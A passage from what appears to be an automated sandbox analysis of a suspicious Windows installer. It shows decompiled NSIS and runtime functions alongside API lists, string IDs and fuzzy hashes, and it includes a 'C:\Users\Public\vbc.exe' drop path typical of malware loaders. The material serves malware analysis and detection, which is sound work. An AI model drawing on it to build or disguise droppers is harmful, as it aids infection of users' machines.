                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID: W$decode failure: data corruption or bug.$z
                                                • API String ID: 0-3221231465
                                                • Opcode ID: 9d18f4b18fd6c1e578f0888356f88911b46e24024ad03cbe1d703a5328ba0373
                                                • Instruction ID: c5430aa4c463919f0ea362af26aa6ff43b67475c375dbb6a15b9f8237f04ba1c
                                                • Opcode Fuzzy Hash: 9d18f4b18fd6c1e578f0888356f88911b46e24024ad03cbe1d703a5328ba0373
                                                • Instruction Fuzzy Hash: 52F1A174E0520ACFEB14DF98C585A9EBBF1FF48394F218429E859A7354C734A981CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405DFA(CHAR* _a4) {
                                                				char _t5;
                                                				char _t7;
                                                				char* _t15;
                                                				char* _t16;
                                                				CHAR* _t17;
                                                
                                                				_t17 = _a4;
                                                				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                					_t17 =  &(_t17[4]);
                                                				}
                                                				if( *_t17 != 0 && E004056F8(_t17) != 0) {
                                                					_t17 =  &(_t17[2]);
                                                				}
                                                				_t5 =  *_t17;
                                                				_t15 = _t17;
                                                				_t16 = _t17;
                                                				if(_t5 != 0) {
                                                					do {
                                                						if(_t5 > 0x1f &&  *((char*)(E004056B6("*?|<>/\":", _t5))) == 0) {
                                                							E00405830(_t16, _t17, CharNextA(_t17) - _t17);
                                                							_t16 = CharNextA(_t16);
                                                						}
                                                						_t17 = CharNextA(_t17);
                                                						_t5 =  *_t17;
                                                					} while (_t5 != 0);
                                                				}
                                                				 *_t16 =  *_t16 & 0x00000000;
                                                				while(1) {
                                                					_t16 = CharPrevA(_t15, _t16);
                                                					_t7 =  *_t16;
                                                					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                						break;
                                                					}
                                                					 *_t16 =  *_t16 & 0x00000000;
                                                					if(_t15 < _t16) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				return _t7;
                                                			}









                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-1374994687
                                                • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                                                • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403EBB(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                				struct tagLOGBRUSH _v16;
                                                				long _t35;
                                                				long _t37;
                                                				void* _t40;
                                                				long* _t49;
                                                
                                                				if(_a4 + 0xfffffecd > 5) {
                                                					L15:
                                                					return 0;
                                                				}
                                                				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                				if(_t49 == 0) {
                                                					goto L15;
                                                				}
                                                				_t35 =  *_t49;
                                                				if((_t49[5] & 0x00000002) != 0) {
                                                					_t35 = GetSysColor(_t35);
                                                				}
                                                				if((_t49[5] & 0x00000001) != 0) {
                                                					SetTextColor(_a8, _t35);
                                                				}
                                                				SetBkMode(_a8, _t49[4]);
                                                				_t37 = _t49[1];
                                                				_v16.lbColor = _t37;
                                                				if((_t49[5] & 0x00000008) != 0) {
                                                					_t37 = GetSysColor(_t37);
                                                					_v16.lbColor = _t37;
                                                				}
                                                				if((_t49[5] & 0x00000004) != 0) {
                                                					SetBkColor(_a8, _t37);
                                                				}
                                                				if((_t49[5] & 0x00000010) != 0) {
                                                					_v16.lbStyle = _t49[2];
                                                					_t40 = _t49[3];
                                                					if(_t40 != 0) {
                                                						DeleteObject(_t40);
                                                					}
                                                					_t49[3] = CreateBrushIndirect( &_v16);
                                                				}
                                                				return _t49[3];
                                                			}









                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                                                • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E004026AF(struct _OVERLAPPED* __ebx) {
                                                				void* _t27;
                                                				long _t32;
                                                				struct _OVERLAPPED* _t47;
                                                				void* _t51;
                                                				void* _t53;
                                                				void* _t56;
                                                				void* _t57;
                                                				void* _t58;
                                                
                                                				_t47 = __ebx;
                                                				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
                                                				_t52 = E00402A29(0xfffffff0);
                                                				 *(_t58 - 0x38) = _t24;
                                                				if(E004056F8(_t52) == 0) {
                                                					E00402A29(0xffffffed);
                                                				}
                                                				E00405850(_t52);
                                                				_t27 = E0040586F(_t52, 0x40000000, 2);
                                                				 *(_t58 + 8) = _t27;
                                                				if(_t27 != 0xffffffff) {
                                                					_t32 =  *0x423f54; // 0x8200
                                                					 *(_t58 - 0x30) = _t32;
                                                					_t51 = GlobalAlloc(0x40, _t32);
                                                					if(_t51 != _t47) {
                                                						E004030B3(_t47);
                                                						E00403081(_t51,  *(_t58 - 0x30));
                                                						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
                                                						 *(_t58 - 0x34) = _t56;
                                                						if(_t56 != _t47) {
                                                							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
                                                							while( *_t56 != _t47) {
                                                								_t49 =  *_t56;
                                                								_t57 = _t56 + 8;
                                                								 *(_t58 - 0x48) =  *_t56;
                                                								E00405830( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                                								_t56 = _t57 +  *(_t58 - 0x48);
                                                							}
                                                							GlobalFree( *(_t58 - 0x34));
                                                						}
                                                						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
                                                						GlobalFree(_t51);
                                                						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
                                                					}
                                                					CloseHandle( *(_t58 + 8));
                                                				}
                                                				_t53 = 0xfffffff3;
                                                				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
                                                					_t53 = 0xffffffef;
                                                					DeleteFileA( *(_t58 - 0x38));
                                                					 *((intOrPtr*)(_t58 - 4)) = 1;
                                                				}
                                                				_push(_t53);
                                                				E00401423();
                                                				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t58 - 4));
                                                				return 0;
                                                			}












                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00008200,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                • GlobalFree.KERNEL32(?), ref: 00402758
                                                • WriteFile.KERNEL32(?,00000000,?,?), ref: 0040276A
                                                • GlobalFree.KERNEL32(00000000), ref: 00402771
                                                • CloseHandle.KERNEL32(?), ref: 00402789
                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                • String ID:
                                                • API String ID: 3294113728-0
                                                • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                                                • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404E84(CHAR* _a4, CHAR* _a8) {
                                                				struct HWND__* _v8;
                                                				signed int _v12;
                                                				CHAR* _v32;
                                                				long _v44;
                                                				int _v48;
                                                				void* _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				CHAR* _t26;
                                                				signed int _t27;
                                                				CHAR* _t28;
                                                				long _t29;
                                                				signed int _t39;
                                                
                                                				_t26 =  *0x423724; // 0x0
                                                				_v8 = _t26;
                                                				if(_t26 != 0) {
                                                					_t27 =  *0x423ff4; // 0x0
                                                					_v12 = _t27;
                                                					_t39 = _t27 & 0x00000001;
                                                					if(_t39 == 0) {
                                                						E00405BBA(0, _t39, 0x41fd10, 0x41fd10, _a4);
                                                					}
                                                					_t26 = lstrlenA(0x41fd10);
                                                					_a4 = _t26;
                                                					if(_a8 == 0) {
                                                						L6:
                                                						if((_v12 & 0x00000004) == 0) {
                                                							_t26 = SetWindowTextA( *0x423708, 0x41fd10);
                                                						}
                                                						if((_v12 & 0x00000002) == 0) {
                                                							_v32 = 0x41fd10;
                                                							_v52 = 1;
                                                							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                							_v44 = 0;
                                                							_v48 = _t29 - _t39;
                                                							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                						}
                                                						if(_t39 != 0) {
                                                							_t28 = _a4;
                                                							 *((char*)(_t28 + 0x41fd10)) = 0;
                                                							return _t28;
                                                						}
                                                					} else {
                                                						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                						if(_t26 < 0x800) {
                                                							_t26 = lstrcatA(0x41fd10, _a8);
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t26;
                                                 			}

                                                APIs
                                                • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                • SendMessageA.USER32 ref: 00404F18
                                                • SendMessageA.USER32 ref: 00404F32
                                                • SendMessageA.USER32 ref: 00404F40
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                 • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                 • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                 • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                 • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                 • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2531174081-0
                                                • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                                                • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404753(struct HWND__* _a4, intOrPtr _a8) {
                                                				long _v8;
                                                				signed char _v12;
                                                				unsigned int _v16;
                                                				void* _v20;
                                                				intOrPtr _v24;
                                                				long _v56;
                                                				void* _v60;
                                                				long _t15;
                                                				unsigned int _t19;
                                                				signed int _t25;
                                                				struct HWND__* _t28;
                                                
                                                				_t28 = _a4;
                                                				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                				if(_a8 == 0) {
                                                					L4:
                                                					_v56 = _t15;
                                                					_v60 = 4;
                                                					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                					return _v24;
                                                				}
                                                				_t19 = GetMessagePos();
                                                				_v16 = _t19 >> 0x10;
                                                				_v20 = _t19;
                                                				ScreenToClient(_t28,  &_v20);
                                                				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                				if((_v12 & 0x00000066) != 0) {
                                                					_t15 = _v8;
                                                					goto L4;
                                                				}
                                                				return _t25 | 0xffffffff;
                                                 			}

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                 • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                 • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                 • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                 • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                 • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                                                • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E1000CBA6(void* __ebx, void* __edi, void* __eflags) {
                                                				void* __esi;
                                                				void* _t3;
                                                				intOrPtr _t6;
                                                				long _t14;
                                                				long* _t27;
                                                
                                                				E10008836(_t3);
                                                				if(E1000A00A() != 0) {
                                                					_t6 = E10009B8B(E1000C988);
                                                					 *0x1001bf40 = _t6;
                                                					__eflags = _t6 - 0xffffffff;
                                                					if(_t6 == 0xffffffff) {
                                                						goto L1;
                                                					} else {
                                                						_t27 = E1000A3A9(1, 0x3bc);
                                                						__eflags = _t27;
                                                						if(_t27 == 0) {
                                                							L6:
                                                							E1000CC1C();
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							__eflags = E10009BE7( *0x1001bf40, _t27);
                                                							if(__eflags == 0) {
                                                								goto L6;
                                                							} else {
                                                								_push(0);
                                                								_push(_t27);
                                                								E1000CAF3(__ebx, __edi, _t27, __eflags);
                                                								_t14 = GetCurrentThreadId();
                                                								_t27[1] = _t27[1] | 0xffffffff;
                                                								 *_t27 = _t14;
                                                								__eflags = 1;
                                                								return 1;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					E1000CC1C();
                                                					return 0;
                                                				}
                                                 			}

                                                APIs
                                                • __init_pointers.LIBCMT ref: 1000CBA6
                                                  • Part of subcall function 10008836: RtlEncodePointer.NTDLL(00000000,00000001,1000CBAB,10012861,100196A0,00000008,10012A29,?,00000001,?,100196C0,0000000C,10012AF9,?,00000001,?), ref: 10008839
                                                  • Part of subcall function 10008836: __initp_misc_winsig.LIBCMT ref: 10008854
                                                  • Part of subcall function 10008836: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 10009C4C
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10009C60
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10009C73
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10009C86
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10009C99
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 10009CAC
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 10009CBF
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 10009CD2
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 10009CE5
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 10009CF8
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 10009D0B
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 10009D1E
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 10009D31
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 10009D44
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 10009D57
                                                  • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 10009D6A
                                                • __mtinitlocks.LIBCMT ref: 1000CBAB
                                                • __mtterm.LIBCMT ref: 1000CBB4
                                                • __calloc_crt.LIBCMT ref: 1000CBD9
                                                • __initptd.LIBCMT ref: 1000CBFB
                                                • GetCurrentThreadId.KERNEL32(10012861,100196A0,00000008,10012A29,?,00000001,?,100196C0,0000000C,10012AF9,?,00000001,?), ref: 1000CC02
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                 • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                 • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                 • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                 • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: AddressProc$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                • String ID:
                                                • API String ID: 1593083391-0
                                                • Opcode ID: cb7e5e6cfeb87975e320105455a0c0544134e6ae18d332925f911c74d4e43c03
                                                • Instruction ID: 8fbe05b69add9fc393a99863cab2729825c83d114e8626461645e52e432fd137
                                                • Opcode Fuzzy Hash: cb7e5e6cfeb87975e320105455a0c0544134e6ae18d332925f911c74d4e43c03
                                                • Instruction Fuzzy Hash: A6F0963621972519F224E775BC03F8A36C4DB026F4F14466EF454D50DEEF20A9828551
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
                                                				char _v68;
                                                				int _t11;
                                                				int _t20;
                                                
                                                				if(_a8 == 0x110) {
                                                					SetTimer(_a4, 1, 0xfa, 0);
                                                					_a8 = 0x113;
                                                				}
                                                				if(_a8 == 0x113) {
                                                					_t20 =  *0x40b0d8; // 0x8200
                                                					_t11 =  *0x41f0e8;
                                                					if(_t20 >= _t11) {
                                                						_t20 = _t11;
                                                					}
                                                					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                					SetWindowTextA(_a4,  &_v68);
                                                					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                				}
                                                				return 0;
                                                 			}

                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                • MulDiv.KERNEL32 ref: 00402BB4
                                                • wsprintfA.USER32 ref: 00402BC4
                                                • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402BBE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                 • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                 • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                 • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                 • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                 • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                                • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • setting window to 0x%X, xrefs: 1000134D
                                                • decoding stream of size %u to size %u, starting at %u, xrefs: 1000115F
                                                • E8 transform detected; file size %u, xrefs: 1000142A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                 • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                 • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                 • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                 • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID: E8 transform detected; file size %u$decoding stream of size %u to size %u, starting at %u$setting window to 0x%X
                                                • API String ID: 0-4286174769
                                                • Opcode ID: 347821c0b590c84ff46a00d1acb6a352d551c073a430cad62b225cf9ebc3db1c
                                                • Instruction ID: 6d95b11c59b3497aea08d982f272f40bd572d12cc0e65c72e8296be602c26041
                                                • Opcode Fuzzy Hash: 347821c0b590c84ff46a00d1acb6a352d551c073a430cad62b225cf9ebc3db1c
                                                • Instruction Fuzzy Hash: 92E19FB4904209DFDB04CFA8D590AEEBBF1FF48344F208519E849A7345D775A985CFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E00402336(void* __eax) {
                                                				void* _t15;
                                                				char* _t18;
                                                				int _t19;
                                                				char _t24;
                                                				int _t27;
                                                				signed int _t30;
                                                				intOrPtr _t35;
                                                				void* _t37;
                                                
                                                				_t15 = E00402B1E(__eax);
                                                				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                                				 *(_t37 - 0x34) =  *(_t37 - 0x14);
                                                				 *(_t37 - 0x38) = E00402A29(2);
                                                				_t18 = E00402A29(0x11);
                                                				_t30 =  *0x423ff0; // 0x0
                                                				 *(_t37 - 4) = 1;
                                                				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                                                				if(_t19 == 0) {
                                                					if(_t35 == 1) {
                                                						E00402A29(0x23);
                                                						_t19 = lstrlenA(0x40a410) + 1;
                                                					}
                                                					if(_t35 == 4) {
                                                						_t24 = E00402A0C(3);
                                                						 *0x40a410 = _t24;
                                                						_t19 = _t35;
                                                					}
                                                					if(_t35 == 3) {
                                                						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a410, 0xc00);
                                                					}
                                                					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a410, _t19) == 0) {
                                                						 *(_t37 - 4) = _t27;
                                                					}
                                                					_push( *(_t37 + 8));
                                                					RegCloseKey();
                                                				}
                                                				 *0x423fc8 =  *0x423fc8 +  *(_t37 - 4);
                                                				return 0;
                                                			}












                                                APIs
                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?), ref: 00402374
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf86CE.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsf86CE.tmp,00000000), ref: 004023CD
                                                • RegCloseKey.ADVAPI32(?), ref: 004024B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsf86CE.tmp
                                                • API String ID: 1356686001-3249194528
                                                • Opcode ID: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                                • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                                                • Opcode Fuzzy Hash: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                                • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E00402A69(void* _a4, char* _a8, long _a12) {
                                                				void* _v8;
                                                				char _v272;
                                                				signed char _t16;
                                                				long _t18;
                                                				long _t25;
                                                				intOrPtr* _t27;
                                                				long _t28;
                                                
                                                				_t16 =  *0x423ff0; // 0x0
                                                				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                                                				if(_t18 == 0) {
                                                					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                						__eflags = _a12;
                                                						if(_a12 != 0) {
                                                							RegCloseKey(_v8);
                                                							L8:
                                                							__eflags = 1;
                                                							return 1;
                                                						}
                                                						_t25 = E00402A69(_v8,  &_v272, 0);
                                                						__eflags = _t25;
                                                						if(_t25 != 0) {
                                                							break;
                                                						}
                                                					}
                                                					RegCloseKey(_v8);
                                                					_t27 = E00405F28(4);
                                                					if(_t27 == 0) {
                                                						__eflags =  *0x423ff0; // 0x0
